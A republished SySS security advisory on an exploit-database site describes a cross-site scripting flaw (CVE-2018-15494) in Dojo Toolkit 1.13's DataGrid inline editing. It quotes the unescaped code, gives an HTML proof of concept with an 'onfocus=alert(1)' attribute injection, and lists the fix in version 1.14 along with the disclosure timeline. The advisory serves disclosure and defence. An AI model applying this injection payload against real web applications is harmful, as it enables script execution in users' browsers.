0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Dojo Toolkit 1.13 Cross Site Scripting Vulnerability
Author
Risk
![](/img/risk/critlow_2.gif)
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
Product: Dojo Toolkit Manufacturer: JS Foundation Affected Version(s): 1.13 Tested Version(s): 1.13, 1.10.7 Vulnerability Type: Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2018-07-02 Solution Date: 2018-10-13 Public Disclosure: 2018-10-24 CVE Reference: CVE-2018-15494 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Dojo Toolkit is a JavaScript framework for building JavaScript based applications. The manufacturer describes the product as follows (see [1]): "A JavaScript toolkit that saves you time and scales with your development process. Provides everything you need to build a Web app. Language utilities, UI components, and more, all in one place, designed to work together perfectly." Due to improper escaping, applications using Dojo Toolkit may be vulnerable to cross-site scripting. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The inline editing feature of the dojox.grid.DataGrid component fails to properly escape the cell value when using it as the input field's value attribute while editing is activated by clicking. > formatEditing: function(inDatum, inRowIndex){ > this.needFormatNode(inDatum, inRowIndex); > return '<input class="dojoxGridInput" type="text" value="' + inDatum + '">'; > }, That allows additional element attributes to be introduced, including an "onfocus" handler that will immediately get executed when editing mode is activated. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof-of-Concept (PoC): Demo website with Dojo's dojox.grid.DataGrid component: <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <style type="text/css"> @import "https://ajax.googleapis.com/ajax/libs/dojo/1.13.0/dojox/grid/resources/Grid.css"; html, body { width: 100%; height: 100%; } </style> </head> <body> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/dojo/1.13.0/dojo/dojo.js"></script> <script type="text/javascript"> dojo.require("dojox.grid.DataGrid"); dojo.require("dojo.data.ItemFileWriteStore"); dojo.addOnLoad(function(){ var g = new dojox.grid.DataGrid({ store: new dojo.data.ItemFileWriteStore({ data: {"items" : [ {"foo" : 'bar" onfocus="alert(1)"'} ] } }), structure: [ { field: 'foo', width : '100%', editable: true } ] }); dojo.byId("container").appendChild(g.domNode); g.startup(); }); </script> <div id="container" style="width: 100%; height: 100%;"></div> </body> </html> When clicking the table row to start editing, the cell value is inserted into a text input's value attribute without proper escaping, resulting in markup like <input class="dojoxGridInput" value="bar" onfocus="alert(1)" "="" type="text"> which introduces JavaScript code in the "onfocus" handler that gets immediately executed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to version 1.14 of Dojo Toolkit. More Information: Vendor announcement: https://dojotoolkit.org/blog/dojo-1-14-released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2018-06-04: Vulnerability discovered 2018-07-02: Vulnerability reported to manufacturer 2018-10-13: Patch released by manufacturer 2018-10-24: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Dojo Toolkit https://dojotoolkit.org/ [2] SySS Security Advisory SYSS-2018-010 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-010.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ # 0day.today [2024-07-05] #